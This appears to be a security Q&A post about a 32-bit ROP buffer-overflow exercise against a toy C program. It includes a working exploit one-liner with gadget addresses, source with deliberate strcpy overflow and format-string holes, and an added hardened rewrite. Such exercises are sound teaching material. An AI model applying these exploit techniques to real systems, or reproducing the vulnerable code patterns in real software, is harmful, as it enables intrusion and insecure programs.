I have the following problem: I have this C program and I have done a buffer overflow using ROP gadgets. I have a problem with the output.

I want to stop the printf() call in the vuln function to get the right output but how can I achieve that with the ROP chain?

My program is compiled with gcc.

Compilation:

gcc -m32 -fno-stack-protector -no-pie -o rop rop.c

Payload:

    Overflow + secret address + secret address + the address of pop ebx ; ret +
    the right parameter for the secret function + just_another_secret_function address +
    the address of pop edi ; pop ebp ; ret + the right parameter for just_another_secret_function + exit address

The Input:

./rop "$(python2 -c 'print "A"*112 + "\xd6\x91\x04\x08"+ "\xd6\x91\x04\x08" + "\x53\x93\x04\x08" + "\x41\x46\x46\x45" + "\x24\x92\x04\x08" + "\x52\x93\x04\x08" + "\x01" + "\xde\x92\x04\x08"')"

Source code:

#include <stdio.h>
#include <string.h>

void secret(int magic)
{
        if(magic == 0x45464641) printf("Right!\n");
        else printf("Wrong!\n");
}

void just_another_secret_function(unsigned char one)
{
        if(one == 1) printf("Well done!\n");
}

void vuln (char *s)
{
        char buf[100];
        strcpy(buf, s);   /* unbounded copy: overflows buf and the saved return address */
        printf(buf);      /* runs before vuln() returns, so it prints the whole payload; also a format-string bug */
}

int main (int argc, char **argv)
{
        if(argc>1) vuln(argv[1]);
        return 0;
}

The output should be like this:

Wrong!
Right!
Well done!

and I am getting this output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAFFE$RWrong!
Right!
Well done!
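For comparison, here is a hardened form of vuln(), added as an example and not the poster's code: the copy is bounded so the saved return address can no longer be overwritten, and the input reaches printf() as an argument rather than as the format string. The build flags in the comment are the usual gcc hardening options that the question's compile line turned off.

```c
#include <stdio.h>
#include <string.h>

/* Build (hardened counterpart of the question's compile line):
 *   gcc -m32 -O2 -fstack-protector-strong -fPIE -pie -D_FORTIFY_SOURCE=2 -o rop rop.c
 */

/* Bounded copy of src into dst (size dstsz). Always NUL-terminates.
 * Returns 1 when src had to be truncated to fit, 0 otherwise. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    int truncated = 0;

    if (dstsz == 0)
        return 1;
    if (n >= dstsz) {          /* strcpy() would write past buf[99] here */
        n = dstsz - 1;
        truncated = 1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

/* Hardened vuln(): same 100-byte buffer, but the overflow is refused
 * and the input is printed as data, so "%x" or "%n" in s is not interpreted.
 * Returns the truncation flag so the caller (or a test) can check it. */
int vuln_hardened(const char *s)
{
    char buf[100];
    int truncated = bounded_copy(buf, sizeof buf, s);

    printf("%s\n", buf);
    return truncated;
}

int main(int argc, char **argv)
{
    if (argc > 1)
        vuln_hardened(argv[1]);
    return 0;
}
```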
  • Are you sure about this? You're overflowing buf, which is a local var to vuln(), and you won't be able to pivot until vuln() returns, which is when the epilog pops your controlled data off the stack into RIP. This occurs after the printf() call. Format string might be what you're looking for... (Otherwise you can cheat by using \r at the start of your payload (depending on your shell))
    – wireghoul
    Commented Jun 8, 2022 at 22:36
  • @wireghoul I was trying to achieve that with ROP, but is there another way to get the right output? I have tried to remove the printf() from the source code and it worked very well, but the point is I have to get the right output with the ROP chain, and I am not achieving that; it's kinda frustrating.
    Commented Jun 8, 2022 at 23:19
  • Perhaps read my comment again?
    – wireghoul
    Commented Jun 16, 2022 at 1:05
